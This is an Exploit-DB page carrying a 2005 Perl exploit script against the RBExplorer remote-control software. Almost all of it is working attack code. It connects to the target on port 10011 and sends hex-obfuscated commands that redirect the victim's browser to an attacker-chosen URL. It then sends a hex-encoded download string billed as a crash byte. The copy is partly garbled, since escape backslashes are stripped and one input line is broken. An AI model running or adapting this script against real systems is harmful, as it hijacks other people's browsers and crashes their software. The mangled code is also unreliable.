https://www.exploit-db.com/exploits/1246

漏洞细节尚未披露

#!usr/bin/perl
#
#       RBExplorer Hijack Command Exploit
# ----------------------------------------------
#      Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.kabrian.com /[email protected] 
#

use IO::Socket;

if (@ARGV != 3)
{
print "n RBExplorer Hijack Command Exploitn";
print "-----------------------------------------nn";
print "[!] usage: perl $0 [target] [localIP] [LocalURL]n";
print "[?] exam: perl $0 192.332.34.4 213.234.12.1 http://hijack.spyp0rn.comn";
print "n";
exit ();
}

$adr = $ARGV[0];
$lip = $ARGV[1];
$lurl = $ARGV[2];

$crash =
"x23x44x6fx77x6ex6cx6fx61x64".
"x57x48x4fx41x52x45x59x4fx55x49".
"x53x4ex4fx54x49x4dx50x4fx52x54".
"x41x4ex54x42x55x54x54x48x45x52".
"x45x4fx4ex45x57x41x59x54x4fx46".
"x49x4cx4cx46x52x45x45x49x42x45".
"x4cx49x56x45";

print "n[+] Connect to $adr..n";
$remote = IO::Socket::INET->new(Proto=>"x74x63x70", PeerAddr=>$adr,
PeerPort=>10011, Reuse=>1) or die "Error: can't connect to $adr:10011n";

$chr1 = "x24x49x50x3a";
$chr2 = "x23x4ex61x76x69x67x61x74x65x54x6f";

print "[+] Connectedn";
$remote->autoflush(1);
print $remote "n";
sleep(1);
print $remote "$chr1 $lipn" and print "[+] Hijacking $adr...n" or die
"[-] Error: $lip not listenn";
sleep(2);
print "[+] $lip listening!n";
print $remote "$chr2 $lurln" and print "[+] Hijacking browser...n" or die
"[-] Error: hijacking failedn";
sleep(2);
print "[+] Browser hijacked!n";
print "[+] Sleep 15 seconds..n";
sleep(15);
print "[+] Send crash byte..n";
print $remote "$crash";
sleep(2);
print "[+] DONEnn";
print "..press any key to exitn";
$bla= ;
close $remote;

# milw0rm.com [2005-10-11]